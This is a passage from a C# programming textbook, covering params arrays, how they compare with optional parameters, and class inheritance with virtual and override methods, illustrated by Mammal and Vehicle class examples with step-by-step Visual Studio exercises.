variable of any type that is specified as a list of parameters (placeholder
is replaced with the ith variable in the list that follows). Here’s an
example of a call to this method (the variables fname and lname are
strings, mi is a char, and age is an int):
Click here to view code image
Console.WriteLine("Forename:, Middle Initial:, Last name:,
Age:", fname, mi, lname, age);
The compiler resolves this call into the following:
Click here to view code image
Console.WriteLine("Forename:, Middle Initial:, Last name:,
Age:", new object[4]{fname, mi, lname, age});
Using a params array
In the following exercise, you will implement and test a static method named
Sum. The purpose of this method is to calculate the sum of a variable number
of int arguments passed to it, returning the result as an int. You will do this
by writing Sum to take a params int[] parameter. You will implement two
checks on the params parameter to ensure that the Sum method is completely
robust. You will then call the Sum method with a variety of different
arguments to test it.
Write a params array method
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the ParamsArray solution, which is located in the \Microsoft
Press\VCSBS\Chapter 11\ParamsArray folder in your Documents
folder.
Download from finelybook [email protected]
402
The ParamsArray project contains the Program class in the Program.cs
file, including the doWork method framework that you have seen in
previous chapters. You will implement the Sum method as a static
method of another class called Util (short for “utility”), which you will
add to the project.
3. In Solution Explorer, right-click the ParamsArray project in the
ParamsArray solution, point to Add, and then click Class.
4. In the Add New Item—ParamsArray dialog box, in the middle pane,
click the Class template. In the Name box, type Util.cs, and then click
Add.
The Util.cs file is created and added to the project. It contains an empty
class named Util in the ParamsArray namespace.
5. Add a public static method named Sum to the Util class. This method
should return an int and accept a params array of int values named
paramList. It should look like this:
Click here to view code image
public static int Sum(params int[] paramList)
{
}
The first step in implementing the Sum method is to check the paramList
parameter. Apart from containing a valid set of integers, it can also be
null or it can be an array of zero length. In both of these cases, it is
difficult to calculate the sum, so the best option is to throw an
ArgumentException exception. (You could argue that the sum of the
integers in a zero-length array is 0, but you’ll treat this situation as an
exception in this example.)
6. Add the following code shown in bold to Sum. This code throws an
ArgumentException exception if paramList is null. The Sum method
should now look like this:
Click here to view code image
public static int Sum(params int[] paramList)
{
if (paramList == null)
{
Download from finelybook [email protected]
403
throw new ArgumentException("Util.Sum: null parameter
list");
}
}
7. Add code to the Sum method to throw an ArgumentException exception
if the length of the parameter list array is 0, as shown here in bold:
Click here to view code image
public static int Sum(params int[] paramList)
{
if (paramList == null)
{
throw new ArgumentException("Util.Sum: null parameter
list");
}
if (paramList.Length == 0)
{
throw new ArgumentException("Util.Sum: empty parameter
list");
}
}
If the array passes these two tests, the next step is to add together all the
elements inside the array. You can use a foreach statement to do this,
and you will need a local variable to hold the running total.
8. Declare an integer variable named sumTotal and initialize it to 0,
directly following the code from the preceding step.
Click here to view code image
public static int Sum(params int[] paramList)
{
...
if (paramList.Length == 0)
{
throw new ArgumentException("Util.Sum: empty parameter
list");
}
int sumTotal = 0;
}
9. Add a foreach statement to the Sum method to iterate through the
paramList array. The body of this foreach loop should add each element
in the array to sumTotal. At the end of the method, return the value of
sumTotal by using a return statement, as shown in bold here:
Download from finelybook [email protected]
404
Click here to view code image
public static int Sum(params int[] paramList)
{
...
int sumTotal = 0;
foreach (int i in paramList)
{
sumTotal += i;
}
return sumTotal;
}
10. On the Build menu, click Build Solution, and then confirm that your
solution builds without any errors.
Test the Util.Sum method
1. Display the Program.cs file in the Code and Text Editor window.
2. In the Code and Text Editor window, delete the // TODO: comment and
add the following statement to the doWork method:
Click here to view code image
Console.WriteLine(Util.Sum(null));
3. On the Debug menu, click Start Without Debugging.
The program builds and runs, writing the following message to the
console:
Click here to view code image
Exception: Util.Sum: null parameter list
This confirms that the first check in the method works.
4. Press the Enter key to close the program and return to Visual Studio
2017.
5. In the Code and Text Editor window, change the call to
Console.WriteLine in doWork as shown here:
Console.WriteLine(Util.Sum());
This time, the method is called without any arguments. The compiler
translates the empty argument list into an empty array.
Download from finelybook [email protected]
405
6. On the Debug menu, click Start Without Debugging.
The program builds and runs, writing the following message to the
console:
Click here to view code image
Exception: Util.Sum: empty parameter list
This confirms that the second check in the method works.
7. Press the Enter key to close the program and return to Visual Studio
2017.
8. Change the call to Console.WriteLine in doWork as follows:
Click here to view code image
Console.WriteLine(Util.Sum(10, 9, 8, 7, 6, 5, 4, 3, 2, 1));
9. On the Debug menu, click Start Without Debugging.
Verify that the program builds, runs, and writes the value 55 to the
console.
10. Press Enter to close the application and return to Visual Studio 2017.
Comparing parameter arrays and optional parameters
Chapter 3, “Writing methods and applying scope,” illustrates how to define
methods that take optional parameters. At first glance, it appears there is a
degree of overlap between methods that use parameter arrays and methods
that take optional parameters. However, there are fundamental differences
between them:
A method that takes optional parameters still has a fixed parameter list,
and you cannot pass an arbitrary list of arguments. The compiler
generates code that inserts the default values onto the stack for any
missing arguments before the method runs, and the method is not
aware of which of the arguments are provided by the caller and which
are compiler-generated defaults.
A method that uses a parameter array effectively has a completely
Download from finelybook [email protected]
406
arbitrary list of parameters, and none of them has a default value.
Furthermore, the method can determine exactly how many arguments
the caller provided.
Generally, you use parameter arrays for methods that can take any number
of parameters (including none), whereas you use optional parameters only
where it is not convenient to force a caller to provide an argument for every
parameter.
There is one further situation worth pondering. If you define a method that
takes a parameter list and provide an overload that takes optional parameters,
it is not always immediately apparent which version of the method will be
called if the argument list in the calling statement matches both method
signatures. You will investigate this scenario in the final exercise in this
chapter.
Compare a params array and optional parameters
1. Return to the ParamsArray solution in Visual Studio 2017 and display
the Util.cs file in the Code and Text Editor window
2. Add the following Console.WriteLine statement shown in bold to the
start of the Sum method in the Util class:
Click here to view code image
public static int Sum(params int[] paramList)
{
Console.WriteLine("Using parameter list");
...
}
3. Add another implementation of the Sum method to the Util class. This
version should take four optional int parameters, each with a default
value of 0. In the body of the method, output the message “Using
optional parameters,” and then calculate and return the sum of the four
parameters. The completed method should look like the following code
in bold:
Click here to view code image
class Util
{
...
public static int Sum(int param1 = 0, int param2 = 0, int
Download from finelybook [email protected]
407
param3 = 0, int param4 = 0)
{
Console.WriteLine("Using optional parameters");
int sumTotal = param1 + param2 + param3 + param4;
return sumTotal;
}
}
4. Display the Program.cs file in the Code and Text Editor window.
5. In the doWork method, comment out the existing code then add the
following statement:
Click here to view code image
Console.WriteLine(Util.Sum(2, 4, 6, 8));
This statement calls the Sum method, passing four int parameters. This
call matches both overloads of the Sum method.
6. On the Debug menu, click Start Without Debugging to build and run the
application.
When the application runs, it displays the following messages:
Using optional parameters
20
In this case, the compiler-generated code that called the method that
takes four optional parameters. This is the version of the method that
most closely matches the method call.
7. Press Enter and return to Visual Studio.
8. In the doWork method, change the statement that calls the Sum method
and remove the final argument (8), as shown here:
Click here to view code image
Console.WriteLine(Util.Sum(2, 4, 6));
9. On the Debug menu, click Start Without Debugging to build and run the
application.
When the application runs, it displays the following messages:
Click here to view code image
Download from finelybook [email protected]
408
Using optional parameters
12
The compiler still generated code that called the method that takes
optional parameters, even though the method signature does not exactly
match the call. Given a choice between a method that takes optional
parameters and a method that takes a parameter list, the C# compiler
will use the method that takes optional parameters.
10. Press Enter and return to Visual Studio.
11. In the doWork method, change the statement that calls the Sum method
again and add two more arguments:
Click here to view code image
Console.WriteLine(Util.Sum(2, 4, 6, 8, 10));
12. On the Debug menu, click Start Without Debugging to build and run the
application.
When the application runs, it displays the following messages:
Click here to view code image
Using parameter list
30
This time, more arguments are provided than the method that takes
optional parameters specifies, so the compiler-generated code that calls
the method that takes a parameter array.
13. Press Enter and return to Visual Studio.
Summary
In this chapter, you learned how to use a params array to define a method
that can take any number of arguments. You also saw how to use a params
array of object types to create a method that accepts any number of
arguments of any type. Also, you saw how the compiler resolves method
calls when it has a choice between calling a method that takes a parameter
array and a method that takes optional parameters.
Download from finelybook [email protected]
409
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 12, “Working with inheritance.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Write a method that
accepts any number
of arguments of a
given type
Write a method whose parameter is a params array
of the given type. For example, a method that
accepts any number of bool arguments is declared
like this:
Click here to view code image
someType Method(params bool[] flags)
{
. ..
}
Write a method that
accepts any number
of arguments of any
type
Write a method whose parameter is a params array
whose elements are of type object. For example:
Click here to view code image
someType Method(params object[] paramList)
{
...
}
Download from finelybook [email protected]
410
CHAPTER 12
Working with inheritance
After completing this chapter, you will be able to:
Create a derived class that inherits features from a base class.
Control method hiding and overriding by using the new, virtual, and
override keywords.
Limit accessibility within an inheritance hierarchy by using the
protected keyword.
Define extension methods as an alternative mechanism to using
inheritance.
Inheritance is a key concept in the world of object-oriented programming.
You can use inheritance as a tool to avoid repetition when defining different
classes that have some features in common and are quite clearly related to
one another. Perhaps they are different classes of the same type, each with its
own distinguishing feature—for example, managers, manual workers, and all
employees of a factory. If you were writing an application to simulate the
factory, how would you specify that managers and manual workers have
some features that are the same but also have features that are different? For
example, they all have an employee reference number, but managers have
different responsibilities and perform tasks different from those of manual
workers.
This is where inheritance proves useful.
Download from finelybook [email protected]
411
What is inheritance?
If you ask several experienced programmers the meaning of the term
inheritance, you will typically get different and conflicting answers. Part of
the confusion stems from the fact that the word inheritance itself has several
subtly different meanings. If someone bequeaths something to you in a will,
you are said to inherit it. Similarly, we say that you inherit half of your genes
from your mother and half of your genes from your father. Both of these uses
of the word have very little to do with inheritance in programming.
Inheritance in programming is all about classification—it’s a relationship
between classes. For example, when you were at school, you probably
learned about mammals, and you learned that horses and whales are
examples of mammals. Each has every attribute that a mammal does (it
breathes air, it suckles its young, it is warm-blooded, and so on), but each
also has its own special features (a horse has hooves, but a whale has flippers
and a fluke).
How can you model a horse and a whale in a program? One way is to
create two distinct classes named Horse and Whale. Each class can
implement the behaviors that are unique to that type of mammal, such as Trot
(for a horse) or Swim (for a whale), in its own way. But how do you handle
behaviors that are common to a horse and a whale, such as Breathe or
SuckleYoung? You can add duplicate methods with these names to both
classes, but this situation becomes a maintenance nightmare, especially if you
also decide to start modeling other types of mammals, such as Human and
Aardvark.
In C#, you can use class inheritance to address these issues. A horse, a
whale, a human, and an aardvark are all types of mammals, so you can create
a class named Mammal that provides the common functionality exhibited by
these types. You can then declare that the Horse, Whale, Human, and
Aardvark classes all inherit from Mammal. These classes then automatically
include the functionality of the Mammal class (Breathe, SuckleYoung, and so
on), but you can also augment each class with the functionality unique to a
particular type of mammal—the Trot method for the Horse class and the
Swim method for the Whale class. If you need to modify the way in which a
common method such as Breathe works, you need to change it in only one
place, the Mammal class.
Download from finelybook [email protected]
412
Using inheritance
You declare that a class inherits from another class by using the following
syntax:
Click here to view code image
class DerivedClass : BaseClass
{
...
}
The derived class inherits from the base class, and the methods in the base
class become part of the derived class. In C#, a class is allowed to derive
from, at most, one base class; a class is not allowed to derive from two or
more classes. However, unless DerivedClass is declared as sealed, you can
use the same syntax to derive other classes that inherit from DerivedClass.
(You will learn about sealed classes in Chapter 13, “Creating interfaces and
defining abstract classes.”)
Click here to view code image
class DerivedSubClass : DerivedClass
{
...
}
Continuing the example described earlier, you could declare the Mammal
class as follows. The methods Breathe and SuckleYoung are common to all
mammals.
Click here to view code image
class Mammal
{
public void Breathe()
{
...
}
public void SuckleYoung()
{
...
}
...
}
Download from finelybook [email protected]
413
You could then define classes for each different type of mammal, adding
more methods as necessary, such as in the following example:
Click here to view code image
class Horse : Mammal
{
...
public void Trot()
{
...
}
}
class Whale : Mammal
{
...
public void Swim()
{
...
}
}
Note If you are a C++ programmer, you should notice that you do not
and cannot explicitly specify whether the inheritance is public, private,
or protected. C# inheritance is always implicitly public. If you’re
familiar with Java, note the use of the colon and that there is no extends
keyword.
If you create a Horse object in your application, you can call the Trot,
Breathe, and SuckleYoung methods:
Click here to view code image
Horse myHorse = new Horse();
myHorse.Trot();
myHorse.Breathe();
myHorse.SuckleYoung();
Similarly, you can create a Whale object, but this time you can call the
Swim, Breathe, and SuckleYoung methods; Trot is not available because it is
Download from finelybook [email protected]
414
defined only in the Horse class.
Important Inheritance applies only to classes, not to structures. You
cannot define your own inheritance hierarchy with structures, and you
cannot define a structure that derives from a class or another structure.
All structures actually inherit from an abstract class named
System.ValueType. (Chapter 13 explores abstract classes.) This is purely
an implementation detail of the way in which the Microsoft .NET
Framework defines the common behavior for stack-based value types;
you are unlikely to make direct use of ValueType in your own
applications.
The System.Object class revisited
The System.Object class is the root class of all classes. All classes implicitly
derive from System.Object. Consequently, the C# compiler silently rewrites
the Mammal class as the following code (which you can write explicitly if
you really want to):
Click here to view code image
class Mammal : System.Object
{
...
}
Any methods in the System.Object class are automatically passed down
the chain of inheritance to classes that derive from Mammal, such as Horse
and Whale. In practical terms, this means that all classes that you define
automatically inherit all the features of the System.Object class. This includes
methods such as ToString (discussed in Chapter 2, “Working with variables,
operators, and expressions”), which is used to convert an object to a string,
typically for display purposes.
Download from finelybook [email protected]
415
Calling base-class constructors
In addition to the methods that it inherits, a derived class automatically
contains all the fields from the base class. These fields usually require
initialization when an object is created. You typically perform this kind of
initialization in a constructor. Remember that all classes have at least one
constructor. (If you don’t provide one, the compiler generates a default
constructor for you.)
It is good practice for a constructor in a derived class to call the
constructor for its base class as part of the initialization, which enables the
base-class constructor to perform any additional initialization that it requires.
You can specify the base keyword to call a base-class constructor when you
define a constructor for an inheriting class, as shown in this example:
Click here to view code image
class Mammal // base class
{
public Mammal(string name) // constructor for base class
{
...
}
...
}
class Horse : Mammal // derived class
{
public Horse(string name)
: base(name) // calls Mammal(name)
{
...
}
...
}
If you don’t explicitly call a base-class constructor in a derived-class
constructor, the compiler attempts to silently insert a call to the base class’s
default constructor before executing the code in the derived-class constructor.
Taking the earlier example, the compiler rewrites this:
Click here to view code image
class Horse : Mammal
{
public Horse(string name)
{
Download from finelybook [email protected]
416
...
}
...
}
as this:
Click here to view code image
class Horse : Mammal
{
public Horse(string name)
: base()
{
...
}
...
}
This works if Mammal has a public default constructor. However, not all
classes have a public default constructor (for example, remember that the
compiler generates a default constructor only if you don’t write any
nondefault constructors), in which case, forgetting to call the correct base-
class constructor results in a compile-time error.
Assigning classes
Previous examples in this book show how to declare a variable by using a
class type and how to use the new keyword to create an object. There are also
examples of how the type-checking rules of C# prevent you from assigning
an object of one type to a variable declared as a different type. For example,
given the definitions of the Mammal, Horse, and Whale classes shown here,
the code that follows these definitions is illegal:
Click here to view code image
class Mammal
{
...
}
class Horse : Mammal
{
...
}
Click here to view code image
Download from finelybook [email protected]
417
class Whale : Mammal
{
...
}
...
Horse myHorse = new Horse(...);
Whale myWhale = myHorse; // error - different types
However, it is possible to refer to an object from a variable of a different
type as long as the type used is a class that is higher up the inheritance
hierarchy. So the following statements are legal:
Click here to view code image
Horse myHorse = new Horse(...);
Mammal myMammal = myHorse; // legal, Mammal is the base class of
Horse
If you think about it in logical terms, all Horses are Mammals, so you can
safely assign an object of type Horse to a variable of type Mammal. The
inheritance hierarchy means that you can think of a Horse simply as a special
type of Mammal; it has everything that a Mammal has with a few extra bits
defined by any methods and fields you added to the Horse class. You can
also make a Mammal variable refer to a Whale object. There is one
significant limitation, however: When referring to a Horse or Whale object
by using a Mammal variable, you can access only methods and fields that are
defined by the Mammal class. Any additional methods defined by the Horse
or Whale class are not visible through the Mammal class.
Click here to view code image
Horse myHorse = new Horse(...);
Mammal myMammal = myHorse;
myMammal.Breathe(); // OK - Breathe is part of the Mammal class
myMammal.Trot(); // error - Trot is not part of the Mammal
class
Note The preceding discussion explains why you can assign almost
anything to an object variable. Remember that object is an alias for
System.Object, and all classes inherit from System.Object, either directly
or indirectly.
Download from finelybook [email protected]
418
Be warned that the converse situation is not true. You cannot unreservedly
assign a Mammal object to a Horse variable:
Click here to view code image
Mammal myMammal = new Mammal(...);
Horse myHorse = myMammal; // error
This looks like a strange restriction, but remember that not all Mammal
objects are Horses—some might be Whales. You can assign a Mammal
object to a Horse variable as long as you first check that the Mammal is really
a Horse, by using the as or is operator or by using a cast (Chapter 7,
“Creating and managing classes and objects,” discusses the is and as
operators and casts). The code example that follows uses the as operator to
check that myMammal refers to a Horse, and if it does, the assignment to
myHorseAgain results in myHorseAgain referring to the same Horse object.
If myMammal refers to some other type of Mammal, the as operator returns
null instead.
Click here to view code image
Horse myHorse = new Horse(...);
Mammal myMammal = myHorse; // myMammal refers to a
Horse
...
Horse myHorseAgain = myMammal as Horse; // OK - myMammal was a Horse
...
Whale myWhale = new Whale(...);
myMammal = myWhale;
...
myHorseAgain = myMammal as Horse; // returns null - myMammal
was a Whale
Declaring new methods
One of the hardest tasks in the realm of computer programming is thinking up
unique and meaningful names for identifiers. If you are defining a method for
a class and that class is part of an inheritance hierarchy, sooner or later you
are going to try to reuse a name that is already in use by one of the classes
further up the hierarchy. If a base class and a derived class happen to declare
two methods that have the same signature, you will receive a warning when
Download from finelybook [email protected]
419
you compile the application.
Note The method signature refers to the name of the method and the
number and types of its parameters, but not its return type. Two
methods that have the same name and that take the same list of
parameters have the same signature, even if they return different types.
A method in a derived class masks (or hides) a method in a base class that
has the same signature. For example, if you compile the following code, the
compiler generates a warning message informing you that Horse.Talk hides
the inherited method Mammal.Talk:
Click here to view code image
class Mammal
{
...
public void Talk() // assume that all mammals can talk
{
...
}
}
class Horse : Mammal
{
...
public void Talk() // horses talk in a different way from other
mammals!
{
...
}
}
Although your code will compile and run, you should take this warning
seriously. If another class derives from Horse and calls the Talk method, it
might be expecting the method implemented in the Mammal class to be
called. However, the Talk method in the Horse class hides the Talk method in
the Mammal class, and the Horse.Talk method will be called instead. Most of
the time, such a coincidence is at best a source of confusion, and you should
consider renaming methods to avoid clashes. However, if you’re sure that
Download from finelybook [email protected]
420
you want the two methods to have the same signature, thus hiding the
Mammal.Talk method, you can silence the warning by using the new
keyword, as follows:
Click here to view code image
class Mammal
{
...
public void Talk()
{
...
}
}
class Horse : Mammal
{
...
new public void Talk()
{
...
}
}
Using the new keyword like this does not change the fact that the two
methods are completely unrelated and that hiding still occurs. It just turns the
warning off. In effect, the new keyword says, “I know what I’m doing, so
stop showing me these warnings.”
Declaring virtual methods
Sometimes, you do want to hide the way in which a method is implemented
in a base class. As an example, consider the ToString method in
System.Object. The purpose of ToString is to convert an object to its string
representation. Because this method is very useful, it is a member of the
System.Object class, thereby automatically providing all classes with a
ToString method. However, how does the version of ToString implemented
by System.Object know how to convert an instance of a derived class to a
string? A derived class might contain any number of fields with interesting
values that should be part of the string. The answer is that the implementation
of ToString in System.Object is actually a bit simplistic. All it can do is
convert an object to a string that contains the name of its type, such as
“Mammal” or “Horse.” This is not very useful after all. So why provide a
Download from finelybook [email protected]
421
method that is so useless? The answer to this second question requires a bit of
detailed thought.
Obviously, ToString is a fine idea in concept, and all classes should
provide a method that can be used to convert objects to strings for display or
debugging purposes. It is only the implementation that requires attention. In
fact, you are not expected to call the ToString method defined by
System.Object; it is simply a placeholder. Instead, you might find it more
useful to provide your own version of the ToString method in each class you
define, overriding the default implementation in System.Object. The version
in System.Object is there only as a safety net, in case a class does not
implement or require its own specific version of the ToString method.
A method that is intended to be overridden is called a virtual method. You
should be clear on the difference between overriding a method and hiding a
method. Overriding a method is a mechanism for providing different
implementations of the same method—the methods are all related because
they are intended to perform the same task, but in a class-specific manner.
Hiding a method is a means of replacing one method with another—the
methods are usually unrelated and might perform totally different tasks.
Overriding a method is a useful programming concept; hiding a method is
often an error.
You can mark a method as a virtual method by using the virtual keyword.
For example, the ToString method in the System.Object class is defined like
this:
Click here to view code image
namespace System
{
class Object
{
public virtual string ToString()
{
...
}
...
}
...
}
Download from finelybook [email protected]
422
Note If you have experience developing in Java, you should note that
C# methods are not virtual by default.
Declaring override methods
If a base class declares that a method is virtual, a derived class can use the
override keyword to declare another implementation of that method, as
demonstrated here:
Click here to view code image
class Horse : Mammal
{
...
public override string ToString()
{
...
}
}
The new implementation of the method in the derived class can call the
original implementation of the method in the base class by using the base
keyword, like this:
Click here to view code image
public override string ToString()
{
string temp = base.ToString();
...
}
There are some important rules you must follow when you declare
polymorphic methods (as discussed in the sidebar “Virtual methods and
polymorphism”) by using the virtual and override keywords:
A virtual method cannot be private; it is intended to be exposed to
other classes through inheritance. Similarly, override methods cannot
be private because a class cannot change the protection level of a
method that it inherits. However, override methods can have a special
Download from finelybook [email protected]
423
form of privacy known as protected access, as you will find out in the
next section.
The signatures of the virtual and override methods must be identical;
they must have the same name, number, and types of parameters. Also,
both methods must return the same type.
You can only override a virtual method. If the base class method is not
virtual and you try to override it, you’ll get a compile-time error. This
is sensible; it should be up to the designer of the base class to decide
whether its methods can be overridden.
If the derived class does not declare the method by using the override
keyword, it does not override the base class method; it hides the
method. In other words, it becomes an implementation of a completely
different method that happens to have the same name. As before, this
will cause a compile-time warning, which you can silence by using the
new keyword, as previously described.
An override method is implicitly virtual and can itself be overridden in
a further derived class. However, you are not allowed to explicitly
declare that an override method is virtual by using the virtual keyword.
Virtual methods and polymorphism
Using virtual methods, you can call different versions of the same
method, based on the object type determined dynamically at runtime.
Consider the following examples of classes that defi ne a variation on
the Mammal hierarchy described earlier:
Click here to view code image
class Mammal
{
...
public virtual string GetTypeName()
{
return "This is a mammal" ;
}
}
class Horse : Mammal
{
...
Download from finelybook [email protected]
424
public override string GetTypeName()
{
return "This is a horse";
}
}
class Whale : Mammal
{
...
public override string GetTypeName()
{
return "This is a whale";
}
}
class Aardvark : Mammal
{
...
}
There are two things that you should note: first, the override
keyword used by the GetTypeName method in the Horse and Whale
classes, and second, the fact that the Aardvark class does not have a
GetTypeName method.
Now examine the following block of code:
Click here to view code image
Mammal myMammal;
Horse myHorse = new Horse(...);
Whale myWhale = new Whale(...);
Aardvark myAardvark = new Aardvark(...);
Click here to view code image
myMammal = myHorse;
Console.WriteLine(myMammal.GetTypeName()); // Horse
myMammal = myWhale;
Console.WriteLine(myMammal.GetTypeName()); // Whale
myMammal = myAardvark;
Console.WriteLine(myMammal.GetTypeName()); // Aardvark
What will the three different Console.WriteLine statements output?
At first glance, you would expect them all to print “This is a mammal”
because each statement calls the GetTypeName method on the
myMammal variable, which is a Mammal. However, in the first case,
you can see that myMammal is actually a reference to a Horse.
(Remember, you are allowed to assign a Horse to a Mammal variable
Download from finelybook [email protected]
425
because the Horse class inherits from the Mammal class.) Because the
GetTypeName method is defined as virtual, the runtime works out that it
should call the Horse.GetTypeName method, so the statement actually
prints the message “This is a horse.” The same logic applies to the
second Console.WriteLine statement, which outputs the message “This
is a whale.” The third statement calls Console.WriteLine on an
Aardvark object. However, the Aardvark class does not have a
GetTypeName method, so the default method in the Mammal class is
called, returning the string “This is a mammal.”
This phenomenon of the same statement invoking a different method
depending on its context is called polymorphism, which literally means
“many forms.”
Understanding protected access
The public and private access keywords create two extremes of accessibility:
public fields and methods of a class are accessible to everyone, whereas
private fields and methods of a class are accessible only to the class itself.
These two extremes are sufficient when you consider classes in isolation.
However, as all experienced object-oriented programmers know, isolated
classes cannot solve complex problems. Inheritance is a powerful way of
connecting classes, and there is clearly a special and close relationship
between a derived class and its base class. Frequently, it is useful for a base
class to allow derived classes to access some of its members while also
hiding these members from classes that are not part of the inheritance
hierarchy. In this situation, you can mark members with the protected
keyword. It works like this:
If a class A is derived from another class B, it can access the protected
class members of class B. In other words, inside the derived class A, a
protected member of class B is effectively public.
If a class A is not derived from another class B, it cannot access any
protected members of class B. So, within class A, a protected member
of class B is effectively private.
Download from finelybook [email protected]
426
C# gives programmers the complete freedom to declare methods and
fields as protected. However, most object-oriented programming guidelines
recommend that you keep your fields strictly private whenever possible and
only relax these restrictions when necessary. Public fields violate
encapsulation because all users of the class have direct, unrestricted access to
the fields. Protected fields maintain encapsulation for users of a class, for
whom the protected fields are inaccessible. However, protected fields still
allow encapsulation to be violated by other classes that inherit from the base
class.
Note You can access a protected base class member not only in a
derived class but also in classes derived from the derived class.
In the following exercise, you will define a simple class hierarchy for
modeling different types of vehicles. You will define a base class named
Vehicle and derived classes named Airplane and Car. You will define
common methods named StartEngine and StopEngine in the Vehicle class,
and you will add some methods to both of the derived classes that are specific
to those classes. Finally, you will add a virtual method named Drive to the
Vehicle class and override the default implementation of this method in both
of the derived classes.
Create a hierarchy of classes
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Vehicles solution, which is located in the \Microsoft
Press\VCSBS\Chapter 12\Vehicles folder in your Documents folder.
The Vehicles project contains the file Program.cs, which defines the
Program class with the Main and doWork methods that you have seen in
previous exercises.
3. In Solution Explorer, right-click the Vehicles project, point to Add, and
then click Class.
Download from finelybook [email protected]
427
The Add New Item – Vehicles dialog box opens.
4. In the Add New Item – Vehicles dialog box, verify that the Class
template is highlighted. In the Name box, type Vehicle.cs, and then click
Add.
The file Vehicle.cs is created and added to the project and appears in the
Code and Text Editor window. The file contains the definition of an
empty class named Vehicle.
5. Add the StartEngine and StopEngine methods to the Vehicle class, as
shown next in bold:
Click here to view code image
class Vehicle
{
public void StartEngine(string noiseToMakeWhenStarting)
{
Console.WriteLine($"Starting engine: ");
}
public void StopEngine(string noiseToMakeWhenStopping)
{
Console.WriteLine($"Stopping engine: ");
}
}
All classes that derive from the Vehicle class will inherit these methods.
The values for the noiseToMakeWhenStarting and
noiseToMakeWhenStopping parameters will be different for each type of
vehicle and will help you to identify which vehicle is being started and
stopped later.
6. On the Project menu, click Add Class.
The Add New Item—Vehicles dialog box opens again.
7. In the Name box, type Airplane.cs, and then click Add.
A new file containing a class named Airplane is added to the project and
appears in the Code and Text Editor window.
8. In the Code and Text Editor window, modify the definition of the
Airplane class so that it inherits from the Vehicle class, as shown in bold
Download from finelybook [email protected]
428
here:
Click here to view code image
class Airplane : Vehicle
{
}
9. Add the TakeOff and Land methods to the Airplane class, as shown in
bold in the following:
Click here to view code image
class Airplane : Vehicle
{
public void TakeOff()
{
Console.WriteLine("Taking off");
}
public void Land()
{
Console.WriteLine("Landing");
}
}
10. On the Project menu, click Add Class.
The Add New Item – Vehicles dialog box opens again.
11. In the Name text box, type Car.cs, and then click Add.
A new file containing a class named Car is added to the project and
appears in the Code and Text Editor window.
12. In the Code and Text Editor window, modify the definition of the Car
class so that it derives from the Vehicle class, as shown here in bold:
Click here to view code image
class Car : Vehicle
{
}
13. Add the Accelerate and Brake methods to the Car class, as shown in
bold in the following:
Click here to view code image
class Car : Vehicle
Download from finelybook [email protected]
429
{
public void Accelerate()
{
Console.WriteLine("Accelerating");
}
public void Brake()
{
Console.WriteLine("Braking");
}
}
14. Display the Vehicle.cs file in the Code and Text Editor window.
15. Add the virtual Drive method to the Vehicle class, as presented here in
bold:
Click here to view code image
class Vehicle
{
...
public virtual void Drive()
{
Console.WriteLine("Default implementation of the Drive
method");
}
}
16. Display the Program.cs file in the Code and Text Editor window.
17. In the doWork method, delete the // TODO: comment and add the code
shown in bold to create an instance of the Airplane class and test its
methods by simulating a quick journey by airplane, as follows:
Click here to view code image
static void doWork()
{
Console.WriteLine("Journey by airplane:");
Airplane myPlane = new Airplane();
myPlane.StartEngine("Contact");
myPlane.TakeOff();
myPlane.Drive();
myPlane.Land();
myPlane.StopEngine("Whirr");
}
18. Add the statements that follow (shown in bold) to the doWork method
after the code you just wrote. These statements create an instance of the
Download from finelybook [email protected]
430
Car class and test its methods.
Click here to view code image
static void doWork()
{
...
Console.WriteLine();
Console.WriteLine("Journey by car:");
Car myCar = new Car();
myCar.StartEngine("Brm brm");
myCar.Accelerate();
myCar.Drive();
myCar.Brake();
myCar.StopEngine("Phut phut");
}
19. On the Debug menu, click Start Without Debugging.
In the console window, verify that the program outputs messages
simulating the different stages of performing a journey by airplane and
by car, as shown in the following image:
Notice that both modes of transport invoke the default implementation
of the virtual Drive method because neither class currently overrides this
method.
20. Press Enter to close the application and return to Visual Studio 2017.
21. Display the Airplane class in the Code and Text Editor window.
Override the Drive method in the Airplane class, as follows in bold:
Download from finelybook [email protected]
431
Click here to view code image
class Airplane : Vehicle
{
...
public override void Drive()
{
Console.WriteLine("Flying");
}
}
Note IntelliSense displays a list of available virtual methods. If
you select the Drive method from the IntelliSense list, Visual
Studio automatically inserts into your code a statement that calls
the base.Drive method. If this happens, delete the statement,
because this exercise does not require it.
22. Display the Car class in the Code and Text Editor window. Override the
Drive method in the Car class, as shown in bold in the following:
Click here to view code image
class Car : Vehicle
{
...
public override void Drive()
{
Console.WriteLine("Motoring");
}
}
23. On the Debug menu, click Start Without Debugging.
In the console window, notice that the Airplane object now displays the
message Flying when the application calls the Drive method, and the
Car object displays the message Motoring:
Download from finelybook [email protected]
432
24. Press Enter to close the application and return to Visual Studio 2017.
25. Display the Program.cs file in the Code and Text Editor window.
26. Add the statements shown here in bold to the end of the doWork
method:
Click here to view code image
static void doWork()
{
...
Console.WriteLine("\nTesting polymorphism");
Vehicle v = myCar;
v.Drive();
v = myPlane;
v.Drive();
}
This code tests the polymorphism provided by the virtual Drive method.
The code creates a reference to the Car object by using a Vehicle
variable (which is safe because all Car objects are Vehicle objects) and
then calls the Drive method by using this Vehicle variable. The final two
statements refer the Vehicle variable to the Airplane object and call what
seems to be the same Drive method again.
27. On the Debug menu, click Start Without Debugging.
Download from finelybook [email protected]
433
In the console window, verify that the same messages appear as before,
followed by this text:
Click here to view code image
Testing polymorphism
Motoring
Flying
The Drive method is virtual, so the runtime (not the compiler) works out
which version of the Drive method to call when invoking it through a
Vehicle variable, based on the real type of the object referenced by this
variable. In the first case, the Vehicle object refers to a Car, so the
application calls the Car.Drive method. In the second case, the Vehicle
object refers to an Airplane, so the application calls the Airplane.Drive
method.
28. Press Enter to close the application and return to Visual Studio 2017.
Creating extension methods
Inheritance is a powerful feature that makes it possible for you to extend the
functionality of a class by creating a new class that derives from it. However,
sometimes using inheritance is not the most appropriate mechanism for
adding new behaviors, especially if you need to quickly extend a type without
affecting existing code.
For example, suppose you want to add a new feature to the int type, such
as a method named Negate that returns the negative equivalent value that an
integer currently contains. (I know that you could simply use the unary minus
operator [–] to perform the same task, but bear with me.) One way to achieve
this is to define a new type named NegInt32 that inherits from System.Int32
